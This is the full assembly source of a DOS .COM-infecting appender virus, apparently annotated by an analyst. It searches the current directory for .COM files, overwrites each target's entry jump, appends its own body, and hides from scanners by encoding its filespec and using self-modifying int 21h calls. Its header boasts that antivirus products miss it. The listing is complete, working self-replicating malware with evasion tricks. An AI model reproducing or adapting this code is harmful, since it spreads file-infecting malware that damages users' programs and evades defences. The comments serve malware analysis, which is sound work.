;
; Simple com appender destined to be another SillyC
; so im putting the file name in as the virus name .. nuff said
;
; Unscannable by F-Prot & by TBAV with no flags
; Uses a novel way of beating S flag
;
; Scans as a VCL/IVP variant with AVP/DSAV
;
; ---------------------------------------------------------------------
; Analyst notes (annotation only; every instruction is unchanged)
;
; Syntax/target: MASM/TASM-style directives (.model, offset, ptr, dup),
;   16-bit real mode, DOS .COM image loaded at offset 100h.
; The scanner results quoted above are the original author's claims and
;   cannot be checked from this listing.
;
; Behaviour visible in the listing:
;   * restores the host's first three bytes at 100h from old_bytes
;   * searches with a bare "*.com" filespec (no drive or path component)
;   * skips any match whose first byte is 0E9h (near JMP)
;   * otherwise rewrites the first three bytes as a JMP to the old end of
;     file and appends its own body there; one file per run
;   * returns control to the host at 100h
;
; Static-analysis observations:
;   * the filespec is stored with bit 7 set on each character
;     (bytes 0AAh 0AEh 0E3h 0EFh 0EDh) and decoded only at run time
;   * both write calls are assembled as "int 0A1h" (0CDh 0A1h) and patched
;     to "int 21h" immediately before they execute (self-modifying code)
;   * DOS function numbers are loaded into dh and moved into ah with
;     xchg ax,dx, so no "mov ah,imm8 / int 21h" pair precedes those calls
; ---------------------------------------------------------------------
.model tiny
.code
        org 100h
begin:
        ; First-generation host stub: a hand-encoded 3-byte near jump.
        db 0E9h                         ; opcode of JMP rel16
        dw offset start-103h            ; displacement from 103h (byte after the jump) to start
; start: entry point of the appended body.
; Computes the relocation delta in bp, restores the host's first three
; bytes, decodes the search filespec, sets the DTA and preloads the
; find-first function number.
;
; Calling idiom used throughout: the DOS function number goes into dh,
; the pointer argument is built in ax, and "xchg ax,dx" swaps them so that
; ah = function and dx = pointer when int 21h executes.
start:
        call delta                      ; pushes the run-time address of delta
delta:
        pop bp                          ; bp = run-time address of delta
        sub bp,offset delta             ; bp = run-time minus assemble-time offset; added to data references below

        ; Restore the host's original first three bytes at 100h.
        ; [begin] is addressed without bp: this location is always 100h.
        and word ptr [begin],0          ; clear bytes at 100h-101h
        and byte ptr [begin+2],0        ; clear byte at 102h
        ; NOTE(review): OR-ing into ah/al/bh yields the saved bytes only if
        ; those registers are zero here; presumably this relies on register
        ; state at .COM entry. Confirm before trusting an emulation trace.
        or ah,[old_bytes+bp]            ; saved byte 0
        or al,[old_bytes+bp+1]          ; saved byte 1
        or bh,[old_bytes+bp+2]          ; saved byte 2
        or byte ptr [begin],ah          ; write byte 0 back (location was zeroed above)
        or byte ptr [begin+1],al        ; write byte 1 back
        or byte ptr [begin+2],bh        ; write byte 2 back

        ; Decode the filespec: clear bit 7 of the five stored characters,
        ; turning the stored bytes into "*.com".
        and byte ptr [f_string+bp],7Fh
        and byte ptr [f_string+bp+1],7Fh
        and byte ptr [f_string+bp+2],7Fh
        and byte ptr [f_string+bp+3],7Fh
        and byte ptr [f_string+bp+4],7Fh

        ; int 21h / AH=1Ah: set the disk transfer area to the local dta buffer.
        mov dh,1ah
        lea ax,[bp+offset dta]
        xchg ax,dx                      ; ah = 1Ah, dx = address of dta
        int 21h

        mov dh,4eh                      ; preload AH=4Eh (find first) for the search code that follows
; find_next: search loop.
; On entry dh holds the DOS search function (4Eh on the first pass, 4Fh on
; later passes). For each match it prepares the replacement jump, opens the
; file, reads its first three bytes and rejects files that start with 0E9h.
find_next:
        xor cx,cx                       ; attribute mask 0
        lea ax,[bp+offset f_string]
        xchg ax,dx                      ; ah = search function from dh, dx = filespec
        int 21h
        jc done2                        ; carry set: no (more) matches

        ; DTA offset 1Ah holds the low word of the file size. size - 3 is the
        ; rel16 displacement for a JMP at file offset 0 that lands at the old
        ; end of file. Only the low word is read.
        mov cl,[dta+1ah+bp]
        mov ch,[dta+1bh+bp]
        sub cx,3
        mov [new_bytes+1+bp],cl         ; displacement low byte
        mov [new_bytes+2+bp],ch         ; displacement high byte

        ; int 21h / AX=3D02h: open the matched file (name at DTA+1Eh) read/write.
        mov dx,3D02h
        lea ax,[bp+offset dta+1Eh]
        xchg ax,dx                      ; ax = 3D02h, dx = file name
        int 21h
        xchg ax,bx                      ; bx = value returned in ax (file handle)

        ; int 21h / AH=3Fh: read the first three bytes into old_bytes.
        mov dh,3fh
        mov cx,3
        lea ax,[bp+offset old_bytes]
        xchg ax,dx                      ; ah = 3Fh, dx = old_bytes
        int 21h

        ; Skip test: a first byte of 0E9h (near JMP) is the only condition
        ; checked, so it doubles as the already-processed marker.
        cmp [bp+old_bytes],0E9h
        jne okay
        mov ah,3eh                      ; int 21h / AH=3Eh: close the handle in bx
        int 21h
        mov dh,4fh                      ; switch to AH=4Fh (find next) for the next pass
        jmp find_next
done2:
        jmp done                        ; jump relay to the exit path for the jc above
; okay: modify the file whose handle is in bx.
; Sequence: seek to offset 0, write the 3-byte jump from new_bytes, seek to
; end of file, write the body starting at start, close the handle.
; Both writes are issued through an "int 0A1h" whose operand byte is
; patched to 21h just before execution, so the assembled image contains no
; literal int 21h at the two write sites.
okay:
        ; int 21h / AX=4200h: seek to offset cx:dx = 0 from the start of the file.
        mov dx,4200h
        xor cx,cx
        xor ax,ax
        xchg ax,dx                      ; ax = 4200h, dx = 0
        int 21h

        ; AH=40h write, cx = 3 bytes, dx = new_bytes (0E9h + displacement).
        mov dh,40h
        mov cx,3
        lea ax,[bp+offset new_bytes]
        xchg ax,dx                      ; ah = 40h, dx = new_bytes
        and byte ptr [n1+bp+1],7fh      ; patch operand of the next instruction: 0A1h -> 21h
n1:
        int 0A1h                        ; executes as int 21h after the patch above
        mov byte ptr [n1+bp+1],0A1h     ; put the 0A1h operand back

        ; int 21h / AX=4202h: seek to offset 0 from the end of the file.
        mov dx,4202h
        xor cx,cx
        xor ax,ax
        xchg ax,dx                      ; ax = 4202h, dx = 0
        int 21h

        mov dh,40h                      ; AH=40h write, issued at n2
        ; Length of the appended body. NOTE(review): the extra 56 bytes
        ; presumably cover the data items declared after theend (55 bytes as
        ; declared); confirm against the assembled layout.
        mov cx, offset theend - offset start + 56

        ; Set bit 7 on the filespec characters again before the body is
        ; written, so the copy on disk holds the encoded form.
        or byte ptr [f_string+bp],80h
        or byte ptr [f_string+bp+1],80h
        or byte ptr [f_string+bp+2],80h
        or byte ptr [f_string+bp+3],80h
        or byte ptr [f_string+bp+4],80h

        lea ax,[bp+offset start]
        xchg ax,dx                      ; ah = 40h, dx = run-time address of start
        and byte ptr [n2+bp+1],7fh      ; patch operand of the next instruction: 0A1h -> 21h
n2:
        ; NOTE(review): unlike n1, this operand is not set back to 0A1h, and
        ; the body is written while it is patched; appended copies presumably
        ; contain a plain int 21h at this site. Confirm on a sample.
        int 0A1h                        ; executes as int 21h after the patch above
        mov ah,3Eh                      ; int 21h / AH=3Eh: close the handle in bx
        int 21h
                                        ; execution continues into the exit path; no further search
; done: return to the host.
; Builds the value 100h without a literal 100h immediate, pushes it, clears
; ax, bx, cx, dx and bp, and uses a near ret to transfer control to 100h,
; where the host's original first three bytes were restored earlier.
done:
        mov ax,101h
        xor bx,bx
        xchg ax,bx                      ; ax = 0, bx = 101h
        xor cx,cx
        dec bx                          ; bx = 100h
        xor dx,dx
        push bx                         ; return address = 100h
        xor bp,bp
        xor bx,bx
        ret                             ; near return to 100h (host entry)
;danke db 'Nightwak'
theend:                                 ; end-of-code marker used in the body-length calculation
; Data items. All are addressed as [name+bp] from the code, i.e. relative to
; the relocation delta computed at start.
.data
; Saved first three bytes of the host. The assembled values are
; 0C3h 90h 90h (ret, nop, nop) for the first generation.
old_bytes db 0c3h,90h,90h
; Replacement first three bytes: 0E9h (JMP rel16) plus a displacement
; filled in at run time from the target's file size.
new_bytes db 0E9h, 2 dup (0)
; Buffer installed as the DTA; the code reads the size word at offset 1Ah
; and the file name at offset 1Eh.
dta db 42 dup(0)
; "*.com" stored with bit 7 set on each character (0AAh 0AEh 0E3h 0EFh 0EDh),
; followed by two zero bytes. Decoded in memory before the search and
; re-encoded before the body is written out.
f_string db '*'+80h,'.'+80h,'c'+80h,'o'+80h,'m'+80h,0,0
end begin                               ; program entry point is begin (100h)